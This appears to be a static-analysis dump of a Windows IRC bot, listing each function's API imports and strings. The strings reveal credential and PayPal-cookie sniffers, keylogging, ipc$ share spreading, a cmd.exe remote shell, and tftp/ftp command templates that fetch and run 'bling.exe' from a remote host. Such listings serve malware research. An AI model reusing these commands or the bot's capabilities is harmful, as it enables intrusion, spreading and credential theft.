sub_outside():
KERNEL32.Sleep
KERNEL32.GetTickCount
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
KERNEL32.ExitProcess
KERNEL32.GetLocaleInfoA
KERNEL32.GetVersionExA
KERNEL32.CloseHandle
KERNEL32.CreateFileA
KERNEL32.ReadFile
WS2_32.inet_addr
WS2_32.select
WS2_32.socket
WS2_32.recv
KERNEL32.MultiByteToWideChar
WS2_32.WSAStartup
WS2_32.gethostbyname
KERNEL32.CreatePipe
WS2_32.setsockopt
WS2_32.ioctlsocket
WS2_32.bind
WS2_32.listen
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.send
WS2_32.closesocket
KERNEL32.GetFileAttributesA
KERNEL32.FindFirstFileA
KERNEL32.FindNextFileA
KERNEL32.TerminateThread
WS2_32.ntohs
WS2_32.inet_ntoa
KERNEL32.LoadLibraryA
KERNEL32.GetLocalTime
KERNEL32.GetVersion
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
KERNEL32.HeapDestroy
KERNEL32.TlsFree
KERNEL32.TlsGetValue
KERNEL32.TlsSetValue
NTDLL.RtlDeleteCriticalSection
KERNEL32.LCMapStringW
KERNEL32.WideCharToMultiByte
KERNEL32.GetStringTypeW
|
sub_402EAE(00c5):
KERNEL32.Sleep
"PASS %s\r\n"
|
sub_42B770(02ba):
KERNEL32.SetFilePointer
NTDLL.RtlGetLastWin32Error
|
sub_420D00(03ba):
KERNEL32.DebugBreak
|
sub_41A227(04c3):
KERNEL32.GetTickCount
|
sub_41FEE0(05b0):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_42E9D0(05b0):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_4134DE(078a):
"FTP sniff"
"#mss2"
"NICK "
"220 "
"230 "
"USER "
"PASS "
|
sub_41FF60(07ff):
KERNEL32.MultiByteToWideChar
NTDLL.RtlGetLastWin32Error
|
sub_4327B0(0822):
KERNEL32.GetVersionExA
|
sub_424520(08ae):
"filename != NULL"
"_open.c"
"mode != NULL"
"_open.c"
"_open.c"
|
sub_411875(0ab2):
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
|
sub_41F070(0ad9):
NTDLL.RtlEnterCriticalSection
|
sub_41F0E0(0ad9):
NTDLL.RtlLeaveCriticalSection
|
sub_418302(0b6c):
NTDLL.RtlGetLastWin32Error
"The following Windows services are regi"...
" Unknown"
" Paused"
" Pausing"
" Continuing"
" Running"
" Stoping"
" Starting"
" Stopped"
"%s: %s (%s)"
|
sub_413468(0d1f):
"IRC sniff"
"#mss2"
"OPER "
"NICK "
"oper "
"You are now an IRC Operator"
|
sub_41CFE0(0d6b):
"file != NULL"
"fopen.c"
"*file != _T('\\0')"
"fopen.c"
"mode != NULL"
"fopen.c"
"*mode != _T('\\0')"
"fopen.c"
|
sub_41132D(0d9c):
KERNEL32.CreateFileA
KERNEL32.SetFilePointer
KERNEL32.ReadFile
KERNEL32.CloseHandle
|
sub_4014F8(1017):
KERNEL32.GetModuleHandleA
NTDLL.RtlGetLastWin32Error
KERNEL32.LoadLibraryA
"kernel32.dll"
"SetErrorMode"
"CreateToolhelp32Snapshot"
"Process32First"
"GetDiskFreeSpaceExA"
"GetLogicalDriveStringsA"
"SearchPathA"
"QueryPerformanceCounter"
"QueryPerformanceFrequency"
"RegisterServiceProcess"
"user32.dll"
"SendMessageA"
"FindWindowA"
"IsWindow"
"GetClipboardData"
"CloseClipboard"
"GetAsyncKeyState"
"GetKeyState"
"GetWindowTextA"
"GetForegroundWindow"
"advapi32.dll"
"RegCreateKeyExA"
"RegSetValueExA"
"RegQueryValueExA"
"RegDeleteValueA"
"RegCloseKey"
"ClearEventLogA"
"OpenProcessToken"
"LookupPrivilegeValueA"
"AdjustTokenPrivileges"
"OpenSCManagerA"
"OpenServiceA"
"ControlService"
"CloseServiceHandle"
"EnumServicesStatusA"
"IsValidSecurityDescriptor"
"GetUserNameA"
"gdi32.dll"
"CreateDCA"
"CreateDIBSection"
"CreateCompatibleDC"
"GetDIBColorTable"
"SelectObject"
"BitBlt"
"DeleteDC"
"DeleteObject"
"ws2_32.dll"
"WSAStartup"
"WSASocketA"
"WSAAsyncSelect"
"__WSAFDIsSet"
"WSAIoctl"
"WSAGetLastError"
"WSACleanup"
"socket"
"ioctlsocket"
"connect"
"inet_ntoa"
"inet_addr"
"htons"
"htonl"
"ntohs"
"ntohl"
"send"
"sendto"
"recv"
"recvfrom"
"bind"
"select"
"listen"
"accept"
"setsockopt"
"getsockname"
"gethostname"
"getpeername"
"closesocket"
"wininet.dll"
"InternetGetConnectedState"
"InternetGetConnectedStateEx"
"HttpOpenRequestA"
"HttpSendRequestA"
"InternetConnectA"
"InternetOpenUrlA"
"InternetCrackUrlA"
"InternetReadFile"
"InternetCloseHandle"
"Mozilla/4.0 (compatible)"
"icmp.dll"
"IcmpCreateFile"
"IcmpCloseHandle"
"IcmpSendEcho"
"netapi32.dll"
"NetShareAdd"
"NetShareDel"
"NetShareEnum"
"NetScheduleJobAdd"
"NetApiBufferFree"
"NetRemoteTOD"
"NetUserAdd"
"NetUserDel"
"NetUserEnum"
"NetUserGetInfo"
"NetMessageBufferSend"
"NetWkstaGetInfo"
"dnsapi.dll"
"DnsFlushResolverCache"
"DnsFlushResolverCacheEntry_A"
"iphlpapi.dll"
"DeleteIpNetEntry"
"mpr.dll"
"WNetAddConnection2A"
"WNetAddConnection2W"
"WNetCancelConnection2A"
"WNetCancelConnection2W"
"shell32.dll"
"SHChangeNotify"
"odbc32.dll"
"SQLDriverConnect"
"SQLAllocHandle"
|
sub_42BEA0(1250):
KERNEL32.UnhandledExceptionFilter
|
sub_424CB0(1413):
"ch != _T('\\0')"
"output.c"
|
sub_416ABF(1416):
"%sKB"
"%sKB"
"%sKB"
"failed"
"failed"
"failed"
|
sub_42DC20(15f7):
NTDLL.RtlLeaveCriticalSection
|
sub_4219E0(16bb):
NTDLL.RtlDeleteCriticalSection
|
sub_40216A(1718):
"Kernel32.dll failed. <%d>"
"User32.dll failed. <%d>"
"Advapi32.dll failed. <%d>"
"Gdi32.dll failed. <%d>"
"Ws2_32.dll failed. <%d>"
"Wininet.dll failed. <%d>"
"Icmp.dll failed. <%d>"
"Netapi32.dll failed. <%d>"
"Dnsapi.dll failed. <%d>"
"Iphlpapi.dll failed. <%d>"
"Mpr32.dll failed. <%d>"
"Shell32.dll failed. <%d>"
"Odbc32.dll failed. <%d>"
|
sub_436680(1898):
KERNEL32.GetLocaleInfoW
KERNEL32.GetLocaleInfoA
KERNEL32.MultiByteToWideChar
|
sub_4116E4(1cb6):
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
|
sub_41BF70(1dec):
"memory check error at 0x%08X = 0x%02X, "...
|
sub_424A30(1ed9):
"_flsbuf.c"
"(\"inconsistent IOB fields\", stream->_pt"...
"_flsbuf.c"
|
sub_41C000(207f):
"_heapchk fails with _HEAPBADBEGIN.\n"
"%s"
"_heapchk fails with _HEAPBADNODE.\n"
"%s"
"_heapchk fails with _HEAPBADEND.\n"
"%s"
"_heapchk fails with _HEAPBADPTR.\n"
"%s"
"_heapchk fails with unknown return valu"...
"%s"
"DAMAGE: before %hs block (#%d) at 0x%08"...
"DAMAGE: after %hs block (#%d) at 0x%08X"...
"DAMAGE: on top of Free block at 0x%08X."...
"%hs allocated at file %hs(%d).\n"
"%hs located at 0x%08X is %u bytes long."...
|
sub_419602(21a7):
KERNEL32.CreatePipe
KERNEL32.GetCurrentProcess
KERNEL32.CloseHandle
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
"cmd.exe"
|
sub_426B40(2402):
"flag == 0 || flag == 1"
"_sftbuf.c"
|
sub_4219A0(2601):
KERNEL32.InitializeCriticalSection
|
sub_42B080(270a):
"setlocal.c"
|
sub_40C5EF(28a9):
"NETMANIAC"
"ADIK"
"*** MESSAGE ***"
"[*] Msg body size: %d\n"
|
sub_435310(293a):
"am/pm"
"a/p"
|
sub_425C30(2a82):
NTDLL.RtlGetLastWin32Error
KERNEL32.TlsGetValue
KERNEL32.TlsSetValue
NTDLL.RtlSetLastWin32Error
"tidtable.c"
|
sub_42DB90(2ae8):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
|
sub_42DC50(2c73):
NTDLL.RtlGetLastWin32Error
|
sub_41B330(2daa):
"_CrtCheckMemory()"
"dbgheap.c"
"Client hook re-allocation failure at fi"...
"Client hook re-allocation failure.\n"
"%s"
"Allocation too large or negative: %u by"...
"Error: memory allocation: bad memory bl"...
"%s"
"_CrtIsValidHeapPointer(pUserData)"
"dbgheap.c"
"pOldBlock->nLine == IGNORE_LINE && pOld"...
"dbgheap.c"
"_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLO"...
"dbgheap.c"
"fRealloc || (!fRealloc && pNewBlock == "...
"dbgheap.c"
"_pLastBlock == pOldBlock"
"dbgheap.c"
"_pFirstBlock == pOldBlock"
"dbgheap.c"
|
sub_42C7E0(2ffe):
KERNEL32.GetEnvironmentStringsW
KERNEL32.GetEnvironmentStringsA
KERNEL32.WideCharToMultiByte
KERNEL32.FreeEnvironmentStringsW
|
sub_41E440(331e):
"fprintf.c"
"format != NULL"
"fprintf.c"
|
sub_425B50(3354):
KERNEL32.TlsAlloc
KERNEL32.TlsSetValue
"tidtable.c"
|
sub_418FDB(3687):
KERNEL32.CloseHandle
|
sub_40B8D0(36a1):
KERNEL32.Sleep
|
sub_42B220(3752):
"setlocal.c"
"="
";"
|
sub_42CB30(38f6):
""
"..."
"Runtime Error!\n\nProgram: "
"\n\n"
"Microsoft Visual C++ Runtime Library"
|
sub_40F19D(3b6b):
KERNEL32.CreateFileA
KERNEL32.CloseHandle
"fμΠ\a"
"\\\\%s"
"."
"\\\\%s\\ipc$"
"\\\\%s\\pipe\\wkssvc"
|
sub_42EC40(3fad):
"ungetc.c"
|
sub_418634(3fe3):
"Share name: Resource: "...
"Yes"
"No"
"%-14S %-24S %-6u %-4s"
|
sub_4269E0(4039):
"_sftbuf.c"
"_sftbuf.c"
|
sub_431120(4234):
"initnum.c"
"."
"initnum.c"
"initnum.c"
|
sub_421D10(429b):
NTDLL.RtlAllocateHeap
NTDLL.RtlReAllocateHeap
|
sub_412160(4448):
KERNEL32.CreatePipe
NTDLL.RtlGetLastWin32Error
KERNEL32.CloseHandle
|
sub_412332(4559):
KERNEL32.ReadFile
NTDLL.RtlGetLastWin32Error
|
sub_41C8A0(456d):
"Dumping objects ->\n"
"%s"
"#File Error#(%d) : "
"%hs(%d) : "
"{%ld} "
"client block at 0x%08X, subtype %x, %u "...
"normal block at 0x%08X, %u bytes long.\n"...
"crt block at 0x%08X, subtype %x, %u byt"...
"Object dump complete.\n"
"%s"
|
sub_408990(468e):
KERNEL32.GetTickCount
"mIRC"
"[M]"
"[%d]%s"
"mIRC"
"[M]"
|
sub_42EA50(4816):
KERNEL32.MultiByteToWideChar
"MB_CUR_MAX == 1 || MB_CUR_MAX == 2"
|
sub_4369D0(4caf):
KERNEL32.CompareStringW
KERNEL32.CompareStringA
KERNEL32.MultiByteToWideChar
"cchCount1==0 && cchCount2==1 || cchCoun"...
|
sub_4307A0(5012):
"inittime.c"
|
sub_41AF30(5171):
"_CrtCheckMemory()"
"dbgheap.c"
"Client hook allocation failure at file "...
"Client hook allocation failure.\n"
"%s"
"Invalid allocation size: %u bytes.\n"
"Error: memory allocation: bad memory bl"...
"%s"
|
sub_419367(526b):
KERNEL32.CloseHandle
|
sub_421BE0(52db):
NTDLL.RtlAllocateHeap
|
sub_436820(53c9):
KERNEL32.GetLocaleInfoW
KERNEL32.GetLocaleInfoA
KERNEL32.WideCharToMultiByte
|
sub_422E60(5f2d):
KERNEL32.VirtualAlloc
|
sub_418184(6353):
"The specified service name is invalid."
"The requested control code is undefined"...
"The handle is invalid."
"The handle does not have the required a"...
"The service binary file could not be fo"...
"The service cannot be stopped because o"...
"The database is locked."
"A thread could not be created for the s"...
"The process for the service was started"...
"The requested control code is not valid"...
"An instance of the service is already r"...
"The system is shutting down."
"An unknown error occurred: <%ld>"
|
sub_431450(642b):
"initmon.c"
|
sub_423E50(6774):
"_filbuf.c"
|
sub_410418(67c7):
"GET "
" "
" "
"GET "
"\r\n"
|
sub_416E07(68c3):
" "
" "
"PING"
"PONG %s\n"
"433"
"432"
"NICK %s\n"
|
sub_40DBFE(6aae):
"8a885d04-1ceb-11c9-9fe8-08002b104860"
|
sub_41EF20(6b94):
"_file.c"
"_file.c"
|
sub_40EC3D(6c1b):
KERNEL32.Sleep
""...
|
sub_415B2E(6cb9):
WS2_32.connect
WS2_32.ioctlsocket
WS2_32.__WSAFDIsSet
WS2_32.getsockopt
|
sub_419046(6e41):
KERNEL32.lstrcmpiA
KERNEL32.OpenProcess
KERNEL32.CloseHandle
"SeDebugPrivilege"
" %s (%d)"
" %s (%d)"
" %s (%d)"
"SeDebugPrivilege"
|
sub_40CDDB(6e81):
WS2_32.select
WS2_32.__WSAFDIsSet
|
sub_426810(6ed7):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_413061(6fd2):
KERNEL32.Sleep
"%s (Changed Windows: %s)"
"%s (Buffer full) (%s)"
"%s (Return) (%s)"
|
sub_42B670(7430):
"_"
"."
|
sub_4215E0(744e):
"_freebuf.c"
|
sub_4193BE(7918):
KERNEL32.CloseHandle
|
sub_413351(79f8):
"Bot sniff"
"#mss2"
"[PSNIFF]:"
"PSNIFF//"
"JOIN #"
"302 "
"366 "
":.login"
":!login"
":!Login"
":.Login"
":.ident"
":!ident"
":.hashin"
":!hashin"
|
sub_417120(7aa9):
"-|`_\\{[]}"
"-|`_\\{[]}"
"-|`_\\{[]}"
"-|`_\\{[]}"
|
sub_412F80(7bca):
KERNEL32.GetLocalTime
"[%d-%d-%d %d:%d:%d] %s\r\n"
|
sub_42B510(7d34):
"_.,"
|
sub_4179FA(7d4b):
"mIRC"
"mIRC"
|
sub_40871E(7e76):
KERNEL32.GetTickCount
|
sub_422D50(7fc5):
NTDLL.RtlReAllocateHeap
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
NTDLL.RtlFreeHeap
|
sub_40A958(811e):
KERNEL32.MultiByteToWideChar
"\\\\"
|
sub_409F32(81df):
KERNEL32.GetTickCount
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
KERNEL32.Sleep
"netbios"
|
sub_42DDC0(82a3):
NTDLL.RtlGetLastWin32Error
|
sub_421F70(865e):
KERNEL32.HeapValidate
NTDLL.RtlGetLastWin32Error
|
sub_419E6F(86cb):
KERNEL32.GetTickCount
"POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
"\r\n"
|
sub_421530(86d7):
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
|
sub_41037E(86fd):
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
WS2_32.WSACleanup
"rb"
|
sub_408FCD(8732):
"%s %s stopped. (%d thread(s) stopped.)"
"%s No %s thread found."
|
sub_40B7F9(87f2):
KERNEL32.Sleep
"echo open %s %d > o&echo user 1 1 >> o "...
"bling.exe\r\n"
|
sub_41F0B0(880a):
NTDLL.RtlEnterCriticalSection
|
sub_41F120(880a):
NTDLL.RtlLeaveCriticalSection
|
sub_41889B(893c):
"Account: %S"
"Full Name: %S"
"User Comment: %S"
"Comment: %S"
"Unknown"
"Administrator"
"User"
"Guest"
"Privilege Level: %s"
"Auth Flags: %d"
"Home Directory: %S"
"Parameters: %S"
"Password Age: %d"
"Bad Password Count: %d"
"Number of Logins: %d"
"Last Logon: %d"
"Last Logoff: %d"
"Logon Server: %S"
"Country Code: %d"
"User's Language: %d"
"Max. Storage: %d"
|
sub_41F890(8af0):
NTDLL.RtlUnwind
|
sub_432800(8c7e):
KERNEL32.GetLocaleInfoA
"040a"
"1252"
|
sub_4184FE(8cdb):
KERNEL32.WideCharToMultiByte
|
sub_416F00(8dd5):
"NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
|
sub_4285A0(8e13):
NTDLL.RtlDeleteCriticalSection
|
sub_4179BF(8e50):
KERNEL32.GlobalLock
KERNEL32.GlobalUnlock
|
sub_41EB80(8f05):
"string != NULL"
"sscanf.c"
"format != NULL"
"sscanf.c"
|
sub_432CF0(8fd2):
NTDLL.RtlGetLastWin32Error
|
sub_40EE3A(8fd2):
WS2_32.ntohs
WS2_32.send
"\r\n
|
sub_40AA3E(90cb):
KERNEL32.MultiByteToWideChar
KERNEL32.Sleep
"\\\\"
|
sub_40145D(9155):
KERNEL32.Sleep
"NOTICE"
"PRIVMSG"
"%s"
"%s %s :%s\r\n"
|
sub_421A80(92b5):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
"mlock.c"
|
sub_419E55(963b):
KERNEL32.GetTickCount
|
sub_410301(9713):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.inet_addr
WS2_32.ntohs
WS2_32.connect
WS2_32.closesocket
WS2_32.WSACleanup
|
sub_411539(98d1):
" : USERID : UNIX : %s\r\n"
|
sub_418DE9(9bb4):
"Invalid parameter."
"Server name not found."
"This network request is not supported."
"Not enough memory."
"The name is invalid."
"Duplicate share name."
"Invalid for redirected resource."
"Device or directory does not exist."
"Level parameter is invalid."
"A general failure occurred in the netwo"...
"The operation is allowed only on the pr"...
"The user account already exists."
"The group already exists."
"The password is shorter than required ("...
"An unknown error occurred."
"The computer name is invalid."
"Share not found."
"The user name could not be found."
"Network connection not found."
|
sub_4349B0(9bcf):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_421B20(9bd1):
NTDLL.RtlLeaveCriticalSection
|
sub_417BA1(9dbe):
"SeShutdownPrivilege"
|
sub_40E201(9ddb):
KERNEL32.Sleep
|
sub_4360C0(a18e):
KERNEL32.WideCharToMultiByte
|
sub_41CB60(a1d1):
"%.2X "
" Data: <%s> %s\n"
|
sub_412259(a294):
KERNEL32.GetCurrentProcess
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
"cmd /q"
|
sub_42B8A0(a29e):
"ftell.c"
|
sub_40CF79(a2f7):
WS2_32.send
|
sub_421C60(a50f):
NTDLL.RtlReAllocateHeap
|
sub_40A146(a68a):
NTDLL.RtlDeleteCriticalSection
KERNEL32.InitializeCriticalSectionAndSpinCount
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
|
sub_40132F(a6f6):
KERNEL32.Sleep
KERNEL32.CloseHandle
KERNEL32.ExitProcess
|
sub_418C69(a909):
"Username accounts for local system:"
" %S"
"Total users found: %d."
|
sub_4180E2(a9bc):
NTDLL.RtlGetLastWin32Error
|
sub_4211A0(acae):
"szUserMessage != NULL"
"dbgrpt.c"
""
"..."
"..."
"\n\nFor information on how your program c"...
"Expression: "
"\n\n"
"\nLine: "
"\nFile: "
"\nModule: "
"Debug %s!\n\nProgram: %s%s%s%s%s%s%s%s%s%"...
"_CrtDbgReport: String too long or IO Er"...
"Microsoft Visual C++ Debug Library"
|
sub_42D680(ad38):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
"osfinfo.c"
|
sub_4306B0(adf0):
KERNEL32.SetUnhandledExceptionFilter
|
sub_4185D0(afa1):
KERNEL32.MultiByteToWideChar
|
sub_41D260(afb7):
"string != NULL"
"sprintf.c"
"format != NULL"
"sprintf.c"
|
sub_416A2E(b2db):
"Cdrom"
"Network"
"Disk"
"Invalid"
"Unknown"
|
sub_4306D0(b3eb):
KERNEL32.SetUnhandledExceptionFilter
|
sub_41B920(b6b2):
"_CrtCheckMemory()"
"dbgheap.c"
"Client hook free failure.\n"
"%s"
"_CrtIsValidHeapPointer(pUserData)"
"dbgheap.c"
"_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
"dbgheap.c"
"DAMAGE: before %hs block (#%d) at 0x%08"...
"DAMAGE: after %hs block (#%d) at 0x%08X"...
"pHead->nLine == IGNORE_LINE && pHead->l"...
"dbgheap.c"
"pHead->nBlockUse == nBlockUse"
"dbgheap.c"
"_pLastBlock == pHead"
"dbgheap.c"
"_pFirstBlock == pHead"
"dbgheap.c"
|
sub_41D360(b784):
"string != NULL"
"sprintf.c"
"format != NULL"
"sprintf.c"
|
sub_41FCE0(b786):
"_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
|
sub_41BD30(b86e):
"_CrtCheckMemory()"
"dbgheap.c"
"_CrtIsValidHeapPointer(pUserData)"
"dbgheap.c"
"_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
"dbgheap.c"
"pHead->nBlockUse == nBlockUse"
"dbgheap.c"
|
sub_413565(b9cf):
"HTTP sniff"
"#mss2"
"paypal"
"PAYPAL"
"PAYPAL.COM"
"paypal.com"
"Set-Cookie:"
|
sub_40E268(baa6):
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
"\\\\%s"
"%s\\ipc$"
|
sub_4240D0(bae6):
KERNEL32.ReadFile
NTDLL.RtlGetLastWin32Error
|
sub_415725(bbd6):
WS2_32.inet_addr
KERNEL32.GetTickCount
"%d.%d.%d.%d"
|
sub_402D46(bc9b):
KERNEL32.Sleep
"[MAIN]: Connected to %s."
|
sub_409293(c3fd):
" Total: %d in %s."
|
sub_422000(c575):
KERNEL32.HeapCreate
KERNEL32.HeapDestroy
|
sub_41C600(c585):
"_CrtMemCheckPoint: NULL state pointer.\n"...
"%s"
"Bad memory block found at 0x%08X.\n"
|
sub_42E310(c701):
KERNEL32.CreateFileA
NTDLL.RtlGetLastWin32Error
KERNEL32.CloseHandle
|
sub_40D18E(c86d):
"GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
|
sub_408654(cb72):
KERNEL32.GetTickCount
"%s"
"%s%i"
|
sub_41C460(cbb3):
KERNEL32.HeapValidate
|
sub_437660(cc1e):
"invalid string position"
|
sub_415C17(cde1):
WS2_32.WSASocketA
KERNEL32.GetTickCount
KERNEL32.Sleep
" "
"%s%d "
|
start(cdf3):
"Windows Framework"
|
sub_42D5C0(ced4):
KERNEL32.LoadLibraryA
"user32.dll"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
|
sub_4135EC(cfb4):
"VULN sniff"
"#mss2"
"OpenSSL/0.9.6"
"Serv-U FTP Server"
"OpenSSH_2"
|
sub_429720(d27e):
"KERNEL32"
"IsProcessorFeaturePresent"
|
sub_41F520(d49f):
NTDLL.RtlUnwind
|
sub_4146B0(d826):
WS2_32.socket
WS2_32.ioctlsocket
WS2_32.connect
KERNEL32.Sleep
WS2_32.closesocket
|
sub_42E8B0(d8b8):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_417E0E(d9a3):
"tftp -i %s get %s &%s\r\n"
"echo open %s %d > o&echo user 1 1 >> o "...
|
sub_429A00(db6b):
"e+000"
|
sub_422120(db76):
NTDLL.RtlAllocateHeap
|
sub_410879(dd04):
"text/html"
"application/octet-stream"
"ddd, dd MMM yyyy"
"HH:mm:ss"
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
|
sub_402617(e076):
"%d.%d.%d.%d"
|
sub_41DEE0(e108):
"string != NULL"
"fgets.c"
"fgets.c"
|
sub_420150(e16d):
KERNEL32.GetFileAttributesA
NTDLL.RtlGetLastWin32Error
|
sub_411418(e1a1):
"%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
|
sub_435830(e311):
NTDLL.RtlGetLastWin32Error
"inithelp.c"
"inithelp.c"
|
sub_428900(e6a3):
KERNEL32.RaiseException
|
sub_40A472(e730):
KERNEL32.CreateThread
KERNEL32.Sleep
KERNEL32.CloseHandle
|
sub_420CD0(e7c8):
KERNEL32.ExitProcess
|
sub_42E930(ea10):
KERNEL32.WideCharToMultiByte
|
sub_41801E(ec5e):
KERNEL32.GetTickCount
|
sub_437F60(ed95):
KERNEL32.RaiseException
|
sub_4161A7(edda):
KERNEL32.GetLocalTime
"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
|
sub_420960(ef27):
KERNEL32.InterlockedIncrement
KERNEL32.InterlockedDecrement
|
sub_421F00(f07d):
NTDLL.RtlFreeHeap
|
sub_426BE0(f0ae):
"format != NULL"
"input.c"
"input.c"
|
sub_40CA75(f1cc):
"BBBB"
"CCCC"
|
sub_40F788(f386):
KERNEL32.ReadFile
|
sub_40DA10(f522):
KERNEL32.WideCharToMultiByte
|
sub_41D160(f534):
"string != NULL"
"vsprintf.c"
"format != NULL"
"vsprintf.c"
|
sub_416BE3(f5ac):
"failed"
|
sub_422240(f62a):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_4248B0(f9ac):
KERNEL32.InitializeCriticalSection
NTDLL.RtlEnterCriticalSection
"stream.c"
|
sub_414C00(fcb9):
KERNEL32.GetTickCount
|
sub_40AAF6(ff5a):
"FXNBFXFXNBFXFXFXFX"
"FXNBFXFXNBFXFXFXFX"
|